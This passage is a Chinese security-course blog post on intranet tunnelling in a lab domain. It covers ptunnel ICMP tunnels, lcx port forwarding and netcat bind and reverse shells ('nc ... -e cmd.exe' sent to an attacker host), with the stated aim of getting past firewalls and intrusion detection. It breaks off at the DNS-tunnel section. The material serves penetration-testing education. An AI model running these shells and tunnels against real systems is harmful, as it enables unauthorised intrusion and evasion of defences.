<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="71-内网安全-域横向网络&amp;传输&amp;应用层隧道技术">
<meta property="og:type" content="article">
<meta property="og:title" content="71-内网安全-域横向网络&amp;传输&amp;应用层隧道技术">
<meta property="og:url" content="http://example.com/2023/05/04/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/71-%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%9F%E6%A8%AA%E5%90%91%E7%BD%91%E7%BB%9C&%E4%BC%A0%E8%BE%93&%E5%BA%94%E7%94%A8%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/index.html">
<meta property="og:site_name" content="HVVL404">
<meta property="og:description" content="71-内网安全-域横向网络&amp;传输&amp;应用层隧道技术">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008103845132-1956359497.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008113745548-282723442.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008113756234-1225110489.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008113815705-601018907.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008113832303-1299604598.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008113919419-794675204.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008142756245-725774503.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008142943888-1275572884.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008143000375-1411518518.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008143019005-1565955023.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008143028392-946911779.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154153389-815668193.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154604664-977884982.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154622197-1592053763.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154637806-1816122920.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154651107-209004333.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154708119-524637293.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154724488-2032159727.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154802073-307753743.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173138450-2019729909.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173153913-1629740803.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173202625-507389581.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173214204-1304042333.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173227662-1358478727.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173237826-1427939803.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173248613-398345226.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173302000-1427355745.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173321015-486484231.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173346897-1959723869.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173402434-1535599187.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173415146-453897177.png">
<meta property="article:published_time" content="2023-05-04T11:21:33.863Z">
<meta property="article:modified_time" content="2023-05-06T16:06:37.334Z">
<meta property="article:author" content="HVVL404">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008103845132-1956359497.png">

<link rel="canonical" href="http://example.com/2023/05/04/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/71-%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%9F%E6%A8%AA%E5%90%91%E7%BD%91%E7%BB%9C&%E4%BC%A0%E8%BE%93&%E5%BA%94%E7%94%A8%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>71-内网安全-域横向网络&传输&应用层隧道技术 | HVVL404</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">HVVL404</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="house fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="categories fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/05/04/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/71-%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%9F%E6%A8%AA%E5%90%91%E7%BD%91%E7%BB%9C&%E4%BC%A0%E8%BE%93&%E5%BA%94%E7%94%A8%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="HVVL404">
      <meta itemprop="description" content="欢迎来到我的博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="HVVL404">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          71-内网安全-域横向网络&传输&应用层隧道技术
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-05-04 19:21:33" itemprop="dateCreated datePublished" datetime="2023-05-04T19:21:33+08:00">2023-05-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-05-07 00:06:37" itemprop="dateModified" datetime="2023-05-07T00:06:37+08:00">2023-05-07</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/" itemprop="url" rel="index"><span itemprop="name">小迪安全（内网篇）</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>71-内网安全-域横向网络&amp;传输&amp;应用层隧道技术 </p>
<span id="more"></span>

<p>思维导图</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008103845132-1956359497.png" alt="img"></p>
<p><strong>必备知识点：</strong></p>
<p>1.代理和隧道技术区别?</p>
<ul>
<li>代理只是为了解决网络通信问题，有些内网访问不到，可以用代理实现</li>
<li>隧道不仅是解决网络的通信问题，更大的作用是绕过过滤，突破防火墙&#x2F;入侵检测系统。</li>
</ul>
<p>2.隧道技术为了解决什么?</p>
<ul>
<li>防火墙过滤问题、网络连接通信问题、数据回链封装问题</li>
<li>在数据通信被拦截的情况下，可以利用隧道技术封装改变通信协议进行绕过拦截。比如CS、MSF无法上线，数据传输不稳定无回显，出口数据被监控，网络通信存在问题等问题，都可以通过隧道技术解决。</li>
</ul>
<p>3.隧道技术前期的必备条件？</p>
<ul>
<li>在用隧道之前要先探测对应隧道协议是否支持，如果不支持，用这个隧道也没有任何意义！</li>
</ul>
<p>隧道原理</p>
<ul>
<li>在实际的网络中，通常会通过各种边界设备、软&#x2F;硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。</li>
</ul>
<p>常用的隧道技术有以下三种：</p>
<ul>
<li>网络层：IPv6 隧道、ICMP 隧道</li>
<li>传输层：TCP 隧道、UDP 隧道、常规端口转发</li>
<li>应用层：SSH 隧道、HTTP&#x2F;S 隧道、DNS 隧道</li>
</ul>
<p>本课重点：</p>
<ul>
<li>案例1：网络传输应用层检测连通性-检测</li>
<li>案例2：网络层ICMP隧道Ptunnel使用-检测,利用</li>
<li>案例3：传输层转发隧道Portmap使用-检测,利用</li>
<li>案例4：传输层转发隧道Netcat使用-检测,利用,功能</li>
<li>案例5：应用层DNS隧道配合CS上线-检测,利用,说明</li>
</ul>
<p><strong>案例1：网络传输应用层检测连通性-检测</strong></p>
<p>隧道有各种层面的，每个层面又分不同协议，你想要用哪个隧道，就需要先确定目标主机是否支持对应隧道协议。比如你想用一个网络层的 ICMP  隧道，这个时候你要去检测目标主机支不支持ICMP隧道的开启。怎么检测呢？可以使用ping命令去ping地址，看能不能正常通信，如果能的话就可以。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">1.TCP 协议</span><br><span class="line">用“瑞士军刀”——netcat</span><br><span class="line">执行 nc 命令：nc &lt;IP&gt; &lt;端口&gt;</span><br><span class="line"> </span><br><span class="line">2.HTTP 协议</span><br><span class="line">用“curl”工具，执行curl &lt;IP地址:端口&gt;命令。</span><br><span class="line">如果远程主机开启了相应的端口，且内网可连接外网的话，就会输出相应的端口信息</span><br><span class="line"> </span><br><span class="line">3.ICMP 协议</span><br><span class="line">用“ping”命令，执行ping &lt;IP地址/域名&gt;</span><br><span class="line"> </span><br><span class="line">4.DNS 协议</span><br><span class="line">检测DNS连通性常用的命令是“nslookup”和“dig”</span><br><span class="line">nslookup 是windows自带的DNS探测命令</span><br><span class="line">dig是linux系统自带的DNS探测命令</span><br></pre></td></tr></table></figure>

<p><strong>案例2：网络层ICMP隧道ptunnel使用-检测,利用</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">kali2020-Target2-Target3</span><br><span class="line"> </span><br><span class="line">网上介绍的大部分都是老牌工具，ptunnel工具几年前就没有更新了，不推荐使用。</span><br><span class="line">推荐pingtunnel，这个是一直在升级更新的一个工具。</span><br><span class="line"> </span><br><span class="line">老版本介绍：https://github.com/f1vefour/ptunnel(需自行编译)</span><br><span class="line">新版本介绍：https://github.com/esrrhs/pingtunnel(二次开发版)</span><br><span class="line"> </span><br><span class="line">pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具</span><br><span class="line">为什么要转换？因为tcp、udp、sock5这几个协议受到防火墙和工具的拦截，这个工具就是把这些流量伪装成icmp进行数据传输！</span><br><span class="line"> </span><br><span class="line">语法</span><br><span class="line">-p ##表示连接icmp隧道另一端的机器IP（即目标服务器）</span><br><span class="line">-lp ##表示需要监听的本地tcp端口</span><br><span class="line">-da ##指定需要转发的机器的IP（即目标内网某一机器的内网IP）</span><br><span class="line">-dp ##指定需要转发的机器的端口（即目标内网某一机器的内网端口）</span><br><span class="line">-x ##设置连接的密码</span><br><span class="line"> </span><br><span class="line">命令</span><br><span class="line">Webserver：./ptunnel -x xiaodi</span><br><span class="line">Hacker xiaodi：./ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi #转发的3389请求数据给本地1080</span><br><span class="line">Hacker xiaodi：rdesktop 127.0.0.1 1080</span><br></pre></td></tr></table></figure>

<p>环境准备</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008113745548-282723442.png" alt="img"></p>
<p>我们要通过web主机实现对DC的控制，但是DC上面有防护的一些策略，此时可以尝试使用隧道协议。</p>
<p>下面要实现用hacker xiaodi去连接DC，假设前期已知DC的账号密码，攻击者希望通过自己的计算机hacker  xiaodi连接到DC的3389，现在76.x是不可能去连接到33.33这台计算机的（可以在kali输入命令：rdesktop  192.168.33.33，连接不上），因为他们不在一个网段。</p>
<p>现在我要实现请求连接DC的3389端口：先通过hackerxiaodi连接webserver的外网接口192.168.76.150，然后借助33网卡连接DC的33.33。</p>
<p>案例演示</p>
<p>&lt;1&gt;用“ping”命令检测连通性，正常通信，说明支持 ICMP 协议，可以使用 ICMP 隧道。</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008113756234-1225110489.png" alt="img"></p>
<p>&lt;2&gt;在webserver上开启隧道，设置密码为xiaodi。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Webserver：./ptunnel -x xiaodi</span><br></pre></td></tr></table></figure>

<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008113815705-601018907.png" alt="img"></p>
<p>&lt;3&gt;在kali上执行以下命令，将webserver作为跳板，转发目标主机3389请求数据给本地1080端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hacker xiaodi：./ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi</span><br></pre></td></tr></table></figure>

<p>上面命令的意思是请求192.168.76.150（webserver），请求到之后，自己监听一下本地的1080，然后将33.33的3389数据，给到本地的1080。然后下一步就直接利用rdesktop连接本地的1080，实质就是连接33.33。</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008113832303-1299604598.png" alt="img"></p>
<p>&lt;4&gt;在kali上执行以下命令，弹出远程桌面</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hacker xiaodi：rdesktop 127.0.0.1 1080</span><br></pre></td></tr></table></figure>

<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008113919419-794675204.png" alt="img"></p>
<p>这样做有什么意义呢？原来3389连接远程桌面，使用的是3389对应的协议，现在连接远程桌面，流量数据传输就变成使用 ICMP 协议了。</p>
<p><strong>案例3：传输层转发隧道Portmap使用-检测,利用</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">隧道技术：传输层端口转发</span><br><span class="line"> </span><br><span class="line">工具：</span><br><span class="line">windows: lcx</span><br><span class="line">linux：portmap</span><br><span class="line"> </span><br><span class="line">lcx是一个端口转发工具，通过端口转发的形式，将内网服务器的某一个端口映射到公网另一台服务器的一个端口上去！</span><br><span class="line">下载：https://github.com/MrAnonymous-1/lcx</span><br><span class="line"> </span><br><span class="line">命令：</span><br><span class="line">DC(3.21)：lcx -slave &lt;攻击 IP&gt; 3131 127.0.0.1 3389 //将本地3389给攻击IP的3131</span><br><span class="line">webserver(3.31)：lcx -listen 3131 3333 //监听3131转发至3333</span><br><span class="line">kali：rdesktop 192.168.76.143:7777</span><br></pre></td></tr></table></figure>

<p>环境准备</p>
<ul>
<li>受害者内网的主机（无法出网，但是能和内网的主机进行交互）：192.168.3.21（内网ip）</li>
<li>受害者内网的主机（跳板，能出网）：拥有2个IP地址：192.168.3.31（内网ip）和192.168.76.143（外网ip）</li>
<li>攻击者的外网服务器：192.168.76.X</li>
</ul>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008142756245-725774503.png" alt="img"></p>
<p>案例演示</p>
<p>&lt;1&gt;在DC上执行以下命令，将本地3389给webserver的6666。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DC(3.21)：lcx -slave 192.168.3.31 6666 127.0.0.1 3389</span><br></pre></td></tr></table></figure>

<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008142943888-1275572884.png" alt="img"></p>
<p>&lt;2&gt;在webserver上执行以下命令，监听6666端口流量并转发至7777</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">webserver(3.31)：lcx -listen 6666 7777</span><br></pre></td></tr></table></figure>

<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008143000375-1411518518.png" alt="img"></p>
<p>&lt;3&gt;在webserver上执行以下命令，连接webserver的7777，登录远程桌面访问，这里其实登录的是域控DC的远程桌面。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rdesktop 192.168.76.143:7777</span><br></pre></td></tr></table></figure>

<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008143019005-1565955023.png" alt="img"></p>
<p>登录成功</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008143028392-946911779.png" alt="img"></p>
<p><strong>案例4：传输层转发隧道Netcat使用-检测,利用,功能</strong></p>
<p>netcat工具是windows和linux都能利用，但是用的时候一定要确保nc是最新版，linux是自带这个命令，老版本有的不支持-e这个选项，很多功能会有限制。</p>
<p>netcat称为瑞士军刀的原因就是它利用起来非常方便，反弹会话是有很多方式的，可以利用多种协议去实现控制，因为我们在实战过程中会有很多协议被封住被拦截，所以我们要掌握很多种控制的协议，实战中就不会掉链子！</p>
<p>netcat使用的是TCP协议，所以如果受害主机没有过滤TCP协议，我们就可以尝试使用nc命令在传输层建立隧道连接实现与控制主机的通信。</p>
<p>nc命令复习：</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154153389-815668193.png" alt="img"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">环境准备：Kali2020-god\webserver-god\sqlserver|dc</span><br><span class="line"> </span><br><span class="line">1.双向连接反弹shell</span><br><span class="line">环境：攻击主机webserver（3.31）--&gt;受害主机DC（3.21）</span><br><span class="line"> </span><br><span class="line">正向-攻击连接受害</span><br><span class="line">受害：nc -ldp 1234 -e /bin/sh                      //linux（把shell会话反弹给1234端口）</span><br><span class="line">      nc -ldp 1234 -e c:\windows\system32\cmd.exe  //windows（把cmd反弹给1234端口）</span><br><span class="line">攻击：nc 受害主机IP 1234                           //主动连接</span><br><span class="line"> </span><br><span class="line">反向-受害连接攻击</span><br><span class="line">攻击：nc -lvp 1234                         //攻击主机监听自己的1234</span><br><span class="line">受害：nc 攻击主机IP 1234 -e /bin/sh</span><br><span class="line">      nc 攻击主机IP 1234 -e c:\windows\system32\cmd.exe</span><br><span class="line"> </span><br><span class="line">什么时候用正向，什么时候用反向？</span><br><span class="line">这是根据网络情况，如果受害主机可以找到你，就用反向，受害主机找不到你，就用正向。</span><br><span class="line"> </span><br><span class="line">2.多向连接反弹shell-配合转发</span><br><span class="line">环境：kali（76.132）--&gt;webserver（3.31、76.143）--&gt;sqlserver（3.32）</span><br><span class="line"> </span><br><span class="line">反向：</span><br><span class="line">god\Webserver：lcx.exe -listen 2222 3333 //把自己的2222端口给3333</span><br><span class="line">god\Sqlserver：nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe //把cmd反弹给webserver的2222端口</span><br><span class="line">kali或本机：nc -v 192.168.76.143 3333 //连接Webserver的3333端口（获取Sqlserver的cmd窗口数据）</span><br><span class="line"> </span><br><span class="line">思考：正向该怎么操作呢？实战中该怎么选择正向和反向？</span><br><span class="line"> </span><br><span class="line">3.相关netcat主要功能测试</span><br><span class="line">指纹服务：nc -nv 192.168.76.143</span><br><span class="line">端口扫描：nc -v -z 192.168.76.143 1-100</span><br><span class="line">端口监听：nc -lvp xxxx</span><br><span class="line">文件传输：nc -lp 1111 &gt;1.txt | nc -vn xx.xx.x.x 1111 &lt;1.txt -q 1</span><br><span class="line">反弹Shell：见上</span><br></pre></td></tr></table></figure>

<p>案例演示1-正向（攻击连接受害）</p>
<p>&lt;1&gt;在受害主机DC上执行以下命令，将自身的cmd窗口反弹给1234端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DC上：nc -ldp 1234 -e c:\windows\system32\cmd.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154604664-977884982.png" alt="img"></p>
<p>&lt;2&gt;在攻击主机webserver上执行以下命令，主动连接，成功反弹shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">webserver上：nc 192.168.3.21 1234</span><br></pre></td></tr></table></figure>

<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154622197-1592053763.png" alt="img"></p>
<p>案例演示2-反向（受害连接攻击）</p>
<p>&lt;1&gt;在攻击主机webserver上执行以下命令，监听1234端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">webserver：nc -lvp 1234</span><br></pre></td></tr></table></figure>

<p>&lt;2&gt;在受害主机DC上执行以下命令，将自身的命令窗口给到webserver的1234端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc 192.168.3.31 1234 -e c:\windows\system32\cmd.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154637806-1816122920.png" alt="img"></p>
<p>&lt;3&gt;在攻击主机webserver上，成功反弹shell</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154651107-209004333.png" alt="img"></p>
<p>案例演示3-多向连接反弹shell-配合转发-反向</p>
<p>环境：kali（76.132）–&gt;webserver（3.31、76.143）–&gt;sqlserver（3.32）</p>
<p>&lt;1&gt;在Webserver上执行以下命令，把自己的2222端口给3333，并监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">god\Webserver：lcx.exe -listen 2222 3333</span><br></pre></td></tr></table></figure>

<p>&lt;2&gt;在Sqlserver上执行以下命令，把cmd反弹给webserver的2222端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">god\Sqlserver：nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154708119-524637293.png" alt="img"></p>
<p>此时Webserver上监听到会话</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154724488-2032159727.png" alt="img"></p>
<p>&lt;3&gt;在kali上执行以下命令，连接Webserver的3333端口，成功反弹shell，连接到Sqlserver。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kali或本机：nc -v 192.168.76.143 3333</span><br></pre></td></tr></table></figure>

<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008154802073-307753743.png" alt="img"></p>
<p><strong>案例5：应用层DNS隧道配合CS上线-检测,利用,说明</strong></p>
<p>当常见协议监听器被拦截时，可以换其他协议上线，其中dns协议上线基本通杀</p>
